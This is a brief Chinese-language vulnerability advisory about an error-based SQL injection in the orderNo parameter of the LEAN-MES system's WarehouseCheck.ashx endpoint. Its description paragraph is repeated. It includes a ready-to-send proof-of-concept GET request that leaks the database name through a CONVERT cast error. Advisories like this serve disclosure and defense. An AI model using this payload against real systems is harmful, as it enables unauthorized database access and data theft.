Description
深科特LEAN-MES系统的/Handler/WarehouseCheck.ashx接口在处理orderNo参数时,未对用户输入的SQL语句进行有效过滤和校验,存在报错型SQL注入漏洞。攻击者可通过构造恶意的SQL注入语句,利用该漏洞非法获取数据库敏感信息,甚至执行任意SQL命令。
深科特LEAN-MES系统的/Handler/WarehouseCheck.ashx接口在处理orderNo参数时,未对用户输入的SQL语句进行有效过滤和校验,存在报错型SQL注入漏洞。攻击者可通过构造恶意的SQL注入语句,利用该漏洞非法获取数据库敏感信息,甚至执行任意SQL命令。
GET /Handler/WarehouseCheck.ashx?api=GetGrnInfoList&orderNo=1'+AND+CONVERT(int,+db_name())=0--+keHv&itemCode=1 HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.